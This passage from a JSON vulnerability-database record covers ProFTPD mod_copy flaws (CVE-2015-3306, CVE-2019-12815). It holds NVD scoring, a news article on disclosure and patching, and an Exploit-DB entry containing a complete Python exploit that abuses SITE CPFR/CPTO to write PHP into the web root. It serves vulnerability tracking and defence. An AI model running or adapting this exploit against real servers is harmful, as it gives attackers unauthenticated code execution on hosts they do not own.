disclosure without authentication, a related issue to CVE-2015-3306.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-07-19T23:15:00", "type": "cve", "title": "CVE-2019-12815", "cwe": ["CWE-755"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306", "CVE-2019-12815"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/a:proftpd:proftpd:1.3.5b"], "id": "CVE-2019-12815", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-12815", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:proftpd:proftpd:1.3.5b:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2022-05-13T17:37:51", "description": "", "cvss3": {}, "published": "2021-05-26T00:00:00", "type": "exploitdb", "title": "ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 
"baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2015-3306", "CVE-2015-3306"], "modified": "2021-05-26T00:00:00", "id": "EDB-ID:49908", "href": "https://www.exploit-db.com/exploits/49908", "sourceData": "# Exploit Title: ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)\r\n# Date: 25/05/2021\r\n# Exploit Author: Shellbr3ak\r\n# Version: 1.3.5 \r\n# Tested on: Ubuntu 16.04.6 LTS\r\n# CVE : CVE-2015-3306\r\n\r\n#!/usr/bin/env python3\r\n\r\nimport sys\r\nimport socket\r\nimport requests\r\n\r\ndef exploit(client, target):\r\n client.connect((target,21)) # Connecting to the target server\r\n banner = client.recv(74)\r\n print(banner.decode())\r\n client.send(b'site cpfr /etc/passwd\\r\\n')\r\n print(client.recv(1024).decode())\r\n client.send(b'site cpto <?php phpinfo(); ?>\\r\\n') # phpinfo() is just a PoC.\r\n print(client.recv(1024).decode())\r\n client.send(b'site cpfr /proc/self/fd/3\\r\\n')\r\n print(client.recv(1024).decode())\r\n client.send(b'site cpto /var/www/html/test.php\\r\\n')\r\n print(client.recv(1024).decode())\r\n client.close()\r\n print('Exploit Completed')\r\n\r\ndef check(url):\r\n req = requests.get(url) # Requesting the written PoC php file via HTTP\r\n if req.status_code == 200:\r\n print('[+] File Written Successfully')\r\n print(f'[+] Go to : {url}')\r\n else:\r\n print('[!] Something Went Wrong')\r\n print('[!] 
Directory might not be writable')\r\n\r\ndef main():\r\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n target = sys.argv[1]\r\n exploit(client, target)\r\n url = 'http://' + target + '/test.php'\r\n check(url)\r\n\r\nif __name__ == '__main__':\r\n main()", "sourceHref": "https://www.exploit-db.com/download/49908", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:39:53", "description": "A German security researcher has publicly disclosed details of a serious vulnerability in one of the most popular FTP server applications, which is currently being used by more than one million servers worldwide. \n \nThe vulnerable software in question is **ProFTPD**, an open source FTP server used by a large number of popular businesses and websites including SourceForge, Samba and Slackware, and comes pre-installed with many Linux and Unix distributions, like Debian. \n \nDiscovered by [Tobias M\u00e4del](<https://tbspace.de/cve201912815proftpd.html>), the vulnerability resides in the mod_copy module of the ProFTPD application, a component that allows users to copy files/directories from one place to another on a server without having to transfer the data to the client and back. \n \nAccording to M\u00e4del, an incorrect access control issue in the mod_copy module could be exploited by an authenticated user to copy, without authorization, any file to a specific location on the vulnerable FTP server where the user is otherwise not allowed to write a file. \n \nIn rare circumstances, the flaw may also lead to remote code execution or information disclosure attacks. 
\n \n[John Simpson](<https://twitter.com/thracky>), a security researcher at Trend Micro, told The Hacker News that to successfully achieve remote code execution on a targeted server, an attacker needs to copy a malicious PHP file to a location where it can be executed. \n \nTherefore, it's important to note that not every FTP server running vulnerable ProFTPD can be hijacked remotely, since the attacker needs a login on the targeted server, or the server must have anonymous access enabled. \n\nThe vulnerability, tracked as CVE-2019-12815, affects all versions of ProFTPd, including the latest 1.3.6 version, which was released in 2017. \n \nSince the mod_copy module comes enabled by default in most operating systems using ProFTPD, the flaw could potentially affect a large number of servers. \n \nAccording to an [advisory](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12815>), the newly discovered issue is related to a 4-year-old similar vulnerability (CVE-2015-3306) in the mod_copy module that allows remote attackers to read and write to arbitrary files via the site CPFR and site CPTO commands. \n \nM\u00e4del reported the vulnerability to ProFTPd project maintainers in September last year, but the team did not take any action to address the issue for more than 9 months. \n \nSo, the researcher contacted the Debian Security Team last month, after which the ProFTPD team finally [created a patch](<https://github.com/proftpd/proftpd/pull/816>) and just last week backported it to ProFTPD 1.3.6 without releasing a new version of its FTP server. 
\n \nAs a workaround, server administrators can also disable the mod_copy module in the ProFTPd configuration file in order to protect themselves from being a victim of any attack related to this flaw.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-07-23T15:47:00", "type": "thn", "title": "A New 'Arbitrary File Copy' Flaw Affects ProFTPD Powered FTP Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3306", "CVE-2019-12815"], "modified": "2019-07-23T18:31:50", "id": "THN:AB717FBC8FF7C7C1D194A126C788DF50", "href": "https://thehackernews.com/2019/07/linux-ftp-server-security.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}